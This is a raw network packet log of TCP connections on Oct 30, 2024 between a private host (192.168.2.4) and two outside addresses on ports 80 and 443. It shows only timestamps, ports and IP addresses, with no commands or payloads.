                                                                                              Oct 30, 2024 19:47:08.226183891 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:08.226196051 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:08.226212978 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:08.226223946 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:08.226248980 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:08.226253033 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:08.226260900 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:08.226366043 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:08.226377964 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:08.230988026 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:08.231069088 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:08.231084108 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:08.231194973 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:08.231208086 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:08.231220007 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:08.231241941 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:08.231252909 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:08.231264114 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:08.231276035 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:08.231301069 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:08.231323004 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:08.231472015 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:08.231484890 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:08.231498003 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:08.231508970 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:08.231519938 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:08.231530905 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:08.231544018 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:08.231555939 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:08.231566906 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:08.231780052 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:08.231795073 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:08.231812000 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:08.231822968 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:08.231844902 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:08.231920004 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:08.231930971 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:08.231945038 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:08.231956959 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:08.231967926 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:08.231978893 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:08.848954916 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:08.849131107 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:09.079051018 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:09.084723949 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:09.316293001 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:09.316428900 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:09.364979982 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:09.365015984 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:09.365111113 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:09.376061916 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:09.376077890 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:10.431642056 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:10.431884050 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:10.480376959 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:10.480412960 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:10.480734110 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:10.480797052 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:10.484047890 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:10.527334929 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:10.996644020 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:10.996669054 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:10.996709108 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:10.996876001 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:10.996876001 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:10.996910095 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:10.996973991 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:11.203769922 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:11.203783035 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:11.203821898 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:11.203855991 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:11.203890085 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:11.203902960 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:11.203924894 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:11.314490080 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:11.314512968 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:11.314843893 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:11.314877987 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:11.314937115 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:11.439165115 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:11.439203024 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:11.439435005 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:11.439476013 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:11.439519882 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:11.562963009 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:11.562987089 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:11.563198090 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:11.563237906 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:11.563280106 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:11.686158895 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:11.686188936 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:11.686255932 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:11.686290026 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:11.686305046 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:11.686331034 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:11.809602022 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:11.809628010 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:11.809828997 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:11.809875011 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:11.809916019 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:11.862318993 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:11.862340927 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:11.862498045 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:11.862535954 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:11.862574100 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:11.984549046 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:11.984576941 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:11.984781981 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:11.984818935 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:11.984872103 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:12.108149052 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:12.108175993 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:12.108267069 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:12.108299971 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:12.108342886 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:12.231241941 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:12.231266975 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:12.231317043 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:12.231355906 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:12.231374025 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:12.231422901 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:12.330007076 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:12.330034018 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:12.330277920 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:12.330346107 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:12.330425978 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:12.364667892 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:12.364686012 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:12.364795923 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:12.364828110 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:12.364873886 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:12.487988949 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:12.488004923 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:12.488133907 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:12.488162994 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:12.488205910 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:12.576941013 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:12.576957941 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:12.577122927 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:12.577153921 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:12.577203989 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:12.612565994 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:12.612581968 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:12.612677097 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:12.612689972 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:12.612730026 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:12.735363960 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:12.735383987 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:12.735512018 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:12.735548019 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:12.735593081 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:12.823724031 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:12.823744059 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:12.823781967 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:12.823815107 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:12.823831081 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:12.823852062 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:12.859766960 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:12.859791040 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:12.859847069 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:12.859879017 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:12.859891891 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:12.859915972 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:12.982290983 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:12.982311010 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:12.982418060 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:12.982448101 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:12.982490063 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:12.983774900 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:12.983795881 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:12.983872890 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:12.983880997 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:12.983928919 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:13.105912924 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:13.105931997 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:13.106092930 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:13.106121063 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:13.106170893 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:13.107687950 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:13.107703924 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:13.107770920 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:13.107777119 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:13.107816935 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:13.229826927 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:13.229846954 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:13.229973078 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:13.229988098 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:13.230030060 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:13.332729101 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:13.332755089 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:13.332842112 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:13.332859993 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:13.332906008 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:13.353590965 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:13.353611946 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:13.353660107 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:13.353668928 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:13.353699923 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:13.353724003 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:13.355304003 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:13.355324030 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:13.355390072 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:13.355396986 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:13.355422974 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:13.355442047 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:13.476816893 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:13.476840973 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:13.477087975 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:13.477128983 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:13.477176905 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:13.519143105 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:13.519167900 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:13.519344091 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:13.519376993 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:13.519422054 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:13.599790096 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:13.599824905 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:13.599927902 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:13.599965096 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:13.600008965 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:13.600931883 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:13.600950956 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:13.601006031 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:13.601012945 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:13.601047993 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:13.722888947 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:13.722912073 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:13.723031044 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:13.723063946 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:13.723113060 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:13.723937035 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:13.723953009 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:13.724015951 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:13.724030972 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:13.724064112 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:13.846210957 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:13.846235991 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:13.846323013 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:13.846355915 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:13.846400976 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:13.846993923 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:13.847011089 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:13.847074032 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:13.847083092 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:13.847119093 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:13.848529100 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:13.848545074 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:13.848607063 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:13.848614931 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:13.848654985 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:13.969969034 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:13.969990015 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:13.970025063 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:13.970051050 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:13.970066071 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:13.970092058 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:13.971012115 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:13.971028090 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:13.971067905 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:13.971076012 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:13.971108913 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:14.073924065 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:14.073947906 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:14.073992968 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:14.074026108 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:14.074040890 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:14.074062109 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:14.094608068 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:14.094631910 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:14.094671011 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:14.094690084 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:14.094713926 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:14.094737053 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:14.095614910 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:14.095629930 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:14.095679045 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:14.095688105 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:14.095714092 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:14.095731020 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:14.216428041 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:14.216450930 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:14.216490984 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:14.216516018 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:14.216532946 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:14.216546059 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:14.217403889 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:14.217422962 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:14.217452049 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:14.217461109 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:14.217493057 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:14.217508078 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:14.258155107 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:14.258178949 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:14.258213997 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:14.258235931 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:14.258250952 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:14.258271933 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:14.340392113 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:14.340415955 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:14.340454102 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:14.340466022 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:14.340487957 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:14.340508938 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:14.340958118 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:14.340975046 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:14.341015100 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:14.341021061 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:14.341041088 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:14.341061115 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:14.381674051 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:14.381699085 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:14.381747961 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:14.381769896 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:14.381788015 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:14.381814957 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:14.433473110 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:14.433542967 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:14.463913918 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:14.463937998 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:14.463990927 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:14.464009047 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:14.464040995 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:14.464057922 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:14.464579105 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:14.464597940 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:14.464663029 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:14.464673042 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:14.464720011 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:14.504852057 CET4434973187.106.236.48192.168.2.4
